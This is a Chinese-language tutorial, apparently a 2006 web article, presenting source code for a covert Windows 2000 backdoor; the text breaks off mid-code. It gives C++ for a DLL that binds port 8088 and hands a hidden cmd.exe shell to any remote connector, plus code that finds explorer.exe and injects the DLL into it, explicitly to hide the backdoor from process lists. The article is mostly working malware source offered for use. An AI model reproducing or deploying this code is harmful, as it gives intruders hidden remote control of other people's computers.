
WIN2000下一个简单的后门实现

2006-4-3 04:45| 投稿: winserver|

摘要: 不知道大家用过ncx99.exe没有,这个小工具很有用,运行后,它BIND到一个端口,并接管cmd.exe的输入输出,使得远程用户得到一个SHELL来实现各种操作,不需要特别的客户端,只要用WIND...
不知道大家用过ncx99.exe没有,这个小工具很有用,运行后,它BIND到一个端口,并接管cmd.exe的输 入输出,使得远程用户得到一个SHELL来实现各种操作,不需要特别的客户端,只要用WINDOWS自带的 TELNET客户端就可以了。下面我给出类似这个工具的Source code,我这个工具和ncx99.exe有点不一样,用到了远程线程插入技 术,将ncx99.exe功能封装在一个DLL里,然后将DLL插入到explorer.exe进程里,使得程序运行后无进 程,增强了隐蔽性。 先给出DLL的Source code: // test.cpp : Defines the entry point for the DLL application.//#include "stdafx.h"#include  #define iport 8088   static void WINAPI ThreadProc(void* pVoid){WSADATA wsa;SOCKET serverFD;char Buff[1024]; WSAStartup(MAKEWORD(2,2),&wsa);//初始化WinSock serverFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); struct sockaddr_in server; server.sin_family = AF_INET;server.sin_port = htons(iport);server.sin_addr.s_addr=ADDR_ANY;int ret=bind(serverFD,(sockaddr *)&server,sizeof(server));ret=listen(serverFD,4);int iAddrSize = sizeof(server); re: SOCKET clientFD=accept(serverFD,(sockaddr *)&server,&iAddrSize);//每次操作完成连接 断开后程序//返回这里继续阻塞,等待客户端连接 SECURITY_ATTRIBUTES sa;sa.nLength=12;sa.lpSecurityDeor=0;sa.bInheritHandle=true;HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);//创建两个匿名管道ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); STARTUPINFO si;ZeroMemory(&si,sizeof(si));si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;si.wShowWindow = SW_HIDE;si.hStdInput = hReadPipe2;si.hStdOutput = si.hStdError = hWritePipe1;char cmdLine[] = "cmd.exe";PROCESS_INFORMATION ProcessInformation;ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);//将匿名管 道和cmd.exe的输入输出关联 unsigned long lBytesRead; while(1) {ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);//管道是否有数据可读if(lBytesRead) {ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);//读取管道里的数据if(!ret)break;ret=send(clientFD,Buff,lBytesRead,0);//将cmd.exe的输出通过socket发送到客户端if(ret<=0) break;}else{lBytesRead=recv(clientFD,Buff,1024,0);//将socket数据读出if(lBytesRead<=0)break;ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);//将接收到的客户端输入写进管道作 为cmd.exe输入send(clientFD,Buff,lBytesRead,0);if(!ret) break;}} goto 
re; return;}   HANDLE hThreadHandle = NULL; HANDLE HT=NULL; BOOL APIENTRY DllMain( HANDLE hModule, DWORD fdwReason, LPVOID lpReserved){switch(fdwReason){case DLL_PROCESS_ATTACH://首次装载DLL,创建一线程{DWORD dwThreadID;hThreadHandle = CreateThread(NULL, 0, (unsigned long (__stdcall *)(void *)) ThreadProc, NULL, 0, &dwThreadID);}break;case DLL_PROCESS_DETACH:{ if(hThreadHandle)TerminateThread(hThreadHandle,0);} break;case DLL_THREAD_ATTACH:break;case DLL_THREAD_DETACH:break;} return TRUE;} /******************************************************************/ 接下来是插入DLL到explorer.exe进程里的代码,要将DLL插入到explorer进程里,首先要得到这个进程 的ID,下面是取得进程ID的代码:DWORD CInsertDlg::GetProcessId()//获取explorer.exe进程的ID{DWORD Pid=-1;HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);//创建系统快照PROCESSENTRY32 lPrs;ZeroMemory(&lPrs,sizeof(lPrs));lPrs.dwSize=sizeof(lPrs);Process32First(hSnap,&lPrs);//取得系统快照里第一个进程信息if (strstr(targetFile,lPrs.szExeFile))//判断进程信息是否是explorer.exe{Pid=lPrs.th32ProcessID;return Pid;} while(1){ZeroMemory(&lPrs,sizeof(lPrs));lPrs.dwSize=(&lPrs,sizeof(lPrs));if (!Process32Next(hSnap,&lPrs))//继续枚举进程信息{Pid=-1;break;}if (strstr(targetFile,lPrs.szExeFile)){Pid=lPrs.th32ProcessID;break;}} return Pid; } /***************************************************************/得到进程的ID后,就可以执行进程插入: void CInsertDlg::OnButton1() {// TODO: Add your control notification handler code hereDWORD Pid=-1;Pid=GetProcessId();//得到进程ID if (Insert(Pid))//执行远程进程注入{::MessageBox(NULL,"Insert the dll to target process is  success!","Insert",MB_ICONINFORMATION);}else{::MessageBox(NULL,"Insert the dll to target process if failed!","Insert",  
